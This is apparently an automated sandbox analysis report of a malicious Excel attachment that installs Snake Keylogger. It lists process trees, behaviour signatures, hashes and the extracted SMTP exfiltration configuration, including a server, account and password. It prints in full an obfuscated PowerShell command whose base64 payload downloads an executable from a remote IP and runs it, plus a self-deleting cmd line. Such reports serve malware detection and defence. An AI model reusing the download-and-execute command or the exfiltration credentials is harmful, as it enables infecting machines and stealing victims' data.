Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 05:58
Static task
static1
Behavioral task
behavioral1
Sample
Pedido de GmbH.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Pedido de GmbH.xls
Resource
win10v2004-20240802-en
General
-
Target
Pedido de GmbH.xls
-
Size
706KB
-
MD5
7cf3baf28b4c40a5e747ff8b89f001d7
-
SHA1
17ce4f2d4d833ff744335b635b7a37be7ef32f6f
-
SHA256
e72bf4cc80fc4cd1b1924851e85b45b06c20de1d7490947a01197bca64036e4c
-
SHA512
fdde12d17b5d3881ea98df4da3dcd82108c4b988ed134b920d49bad393fece0242f5e9181f86ee8b24beb526b7a46ca7a837808e30f8705456fd2a7a6f317789
-
SSDEEP
12288:m+UOAsHFnd7HeT/o8gg8Rsfe8fB7RY/KKCjCdAT2bbBme+I0u+ssDsh6PG:mepsAbg8R8BNGKtUAT2/YjssDs4P
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2152-59-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2152-60-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2152-61-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 1152 mshta.exe 11 1152 mshta.exe 13 2444 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2444 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1708 audiodg.exe -
Loads dropped DLL 1 IoCs
pid Process 2444 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000019382-51.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1708 set thread context of 2152 1708 audiodg.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language audiodg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2288 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2444 powershell.exe 2444 powershell.exe 2444 powershell.exe 2152 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1708 audiodg.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2152 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1708 audiodg.exe 1708 audiodg.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1708 audiodg.exe 1708 audiodg.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2288 EXCEL.EXE 2288 EXCEL.EXE 2288 EXCEL.EXE 2288 EXCEL.EXE 2288 EXCEL.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1152 wrote to memory of 536 1152 mshta.exe 33 PID 1152 wrote to memory of 536 1152 mshta.exe 33 PID 1152 wrote to memory of 536 1152 mshta.exe 33 PID 1152 wrote to memory of 536 1152 mshta.exe 33 PID 536 wrote to memory of 2444 536 cmd.exe 35 PID 536 wrote to memory of 2444 536 cmd.exe 35 PID 536 wrote to memory of 2444 536 cmd.exe 35 PID 536 wrote to memory of 2444 536 cmd.exe 35 PID 2444 wrote to memory of 2364 2444 powershell.exe 36 PID 2444 wrote to memory of 2364 2444 powershell.exe 36 PID 2444 wrote to memory of 2364 2444 powershell.exe 36 PID 2444 wrote to memory of 2364 2444 powershell.exe 36 PID 2364 wrote to memory of 1996 2364 csc.exe 37 PID 2364 wrote to memory of 1996 2364 csc.exe 37 PID 2364 wrote to memory of 1996 2364 csc.exe 37 PID 2364 wrote to memory of 1996 2364 csc.exe 37 PID 2444 wrote to memory of 1708 2444 powershell.exe 39 PID 2444 wrote to memory of 1708 2444 powershell.exe 39 PID 2444 wrote to memory of 1708 2444 powershell.exe 39 PID 2444 wrote to memory of 1708 2444 powershell.exe 39 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 1708 wrote to memory of 2152 1708 audiodg.exe 40 PID 2152 wrote to memory of 2420 2152 RegSvcs.exe 41 PID 2152 wrote to memory of 2420 2152 RegSvcs.exe 41 PID 2152 wrote to memory of 2420 2152 RegSvcs.exe 41 PID 2152 wrote to memory of 2420 2152 RegSvcs.exe 41 PID 2420 wrote to memory of 2528 2420 cmd.exe 43 PID 2420 wrote to memory of 2528 2420 cmd.exe 43 PID 2420 wrote to memory of 2528 2420 cmd.exe 43 PID 2420 wrote to memory of 2528 2420 cmd.exe 43
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Pedido de GmbH.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2288
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poWErShell -ex bYpaSs -nop -w 1 -c DevICeCReDEnTiALDEplOyMEnt.exE ; Iex($(IeX('[sYSTem.TeXT.eNcODIng]'+[cHar]0X3a+[chAr]58+'utf8.gEtStrING([sYSTEM.cOnVert]'+[cHAr]0x3a+[chAR]58+'FrOMBaSE64STRinG('+[cHAr]34+'JFVCNkp2bHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVyZGVmaW5pVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSV1ZWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFh4TEVmRkJ5Tyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0tZV3JtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhLRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImxpbnhUbCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHR6cSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVUI2SnZseDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNDUwL2F1ZGlvZGcuZXhlIiwiJEVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSI='+[ChaR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWErShell -ex bYpaSs -nop -w 1 -c DevICeCReDEnTiALDEplOyMEnt.exE ; Iex($(IeX('[sYSTem.TeXT.eNcODIng]'+[cHar]0X3a+[chAr]58+'utf8.gEtStrING([sYSTEM.cOnVert]'+[cHAr]0x3a+[chAR]58+'FrOMBaSE64STRinG('+[cHAr]34+'JFVCNkp2bHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVyZGVmaW5pVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSV1ZWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFh4TEVmRkJ5Tyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0tZV3JtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhLRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImxpbnhUbCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHR6cSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVUI2SnZseDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNDUwL2F1ZGlvZGcuZXhlIiwiJEVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSI='+[ChaR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hhiyr3n3.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB09.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB08.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1996
-
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 37⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD52f83796fa8b57b93110664e09f581b49
SHA1dddd047bb5e4de37b36da2134abba8c39928130d
SHA2564b5d219b2b3939cd5226bbb52346034f856ffeca2fc7e098087e24a33eb64ea9
SHA5120a9b36632d8722d59abf984de05c90b2ed7efaad623bb0cfef1b6db8179432600102dae411a3b0d85cc06f8bfa2e03008ede7d1f649e5b061ce37378e948e912
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\IEnetworkCookies[1].hta
Filesize8KB
MD5b11540e896d401969af43ceed6aa19fc
SHA1c1850aea159a8098bc3afc07f5f5a7533d885d9c
SHA256267eb9f8e12d347902ff33d520ca68257dca8703ebeba099cf224efe395e0ecb
SHA512499ca72b70d44d471adef5b00f024e5e8299281d0cbb48ef9a4d95d3b754ae1516786a1ce8c9118615b6f6d3f1d9dc6af220e52a3afc209865a8f9c93baa43c3
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5aba7e66e2ffc2df00994b686c5503fec
SHA16bc6f8a5ee4c28847f5892350f9ddc5e21efae48
SHA256e904366674e6b27438e7747f11b3e5b94b79a71291a5625cabdc7f970c3d1a38
SHA512ddaab97dc4a18060ad210d671dce72bb40c2ab5ccca68a4ebe8454c70a0488664e0c11848ec191fc50f8555f5114219dc17c6fe35c827ecf1e526daeb4573030
-
Filesize
3KB
MD52506183d68bdc021e91defc3312ce320
SHA19bef5e96705a7582387b9b2052ab525d6a108a7e
SHA256fc555056cd5878990c3d7b6ceb381732f0e4e3eb3309559275877409c0d42c4b
SHA512ca058f127546496fcb8f430500a30e22073da53bf2b73abbb14ff3301b9fbeadb8ebb86541b95cf12019e67c1afd756c32cd4196a49b903c07f306f8bebcc474
-
Filesize
7KB
MD5c15bdc8a4ab4f42a65ceca639686db1b
SHA137a614a3d3de9f5804bb9854699cccaccdd7d25b
SHA256669f5d9b3a8f3da256ccd6f14f321817930ea9b5a92cd6aaec9644cc2f5ca334
SHA5125a11628a74bb20ad99a949f316cbc7c5d0622c7b67e17168c32cd53a355d023ea44bf3d82d364eac8ddab898e4baa39e2ed7bff3f3958c32fdb20b1eb2deff5d
-
Filesize
947KB
MD5e714ea3c69c2d24e15890f8ed9e7a5c6
SHA1551a3aad94aed9f2a36c1ac39d37f643623e7fa2
SHA256fa7b4ee7fda712c2127cac0d4f52bbe64fc17f4458afaeec5fcefef4986c308e
SHA512ee73a1d872a29a7e398a108f99923615ac2b0d491bbab43b53ae5fd6b9412b53c7e6a5942571446db5ab8d99356d82f7234b7eecb4e0dcc3c6afb60b5f630f56
-
Filesize
652B
MD5aa5b1076e11d92e2263893e476b4d9b6
SHA1ec9dd515ee0ab852d14726fc9bfa38002a9efe47
SHA2568beffe3641f71c96888ad2fe4f099c0081391655c11121ec0cfff6166ad5793f
SHA51204c75d2f33c30173f88dd80eeef1beda46e212fd8c683d599d77740295e41c0b56172ccac4cece394a7bc24a025c727b268bcd8a79bf2489ad0758609890b323
-
Filesize
467B
MD5123176cf6278ec489005c6ed4e1eed61
SHA16ca30dd3e3331fbcb927ac5f5fd3e6e53ead9ad1
SHA25650e472ea9e7c351fa1344414d2e7b5284df7f7313797cc0295f748d67582e605
SHA512d8405e52fd65c51bf3cbd0c9915a627452799c0f99a942c2ce43681cc2a68ff06fc9a429f7054e1883c4fec7624b86410dce1a27599f5e9ca68cd9a18ea79f36
-
Filesize
309B
MD5f8da0fe02295f4d6d56312f0ba7301f8
SHA18143191b71447a1e1cd0114d36c5d3a7ab6481d1
SHA25694b5ba6be8f985fd26ffe66828b5cf2c45ea02f4f12df719d3c0434f9ebea534
SHA5127a4c2aaa3ca54b82db2a6acd0c67a623c70e063833a8b76d63770567610ac95550114833aba7f73cb3e7a1ed63f55a1db43d01ca814735ce04a1c692828d00f1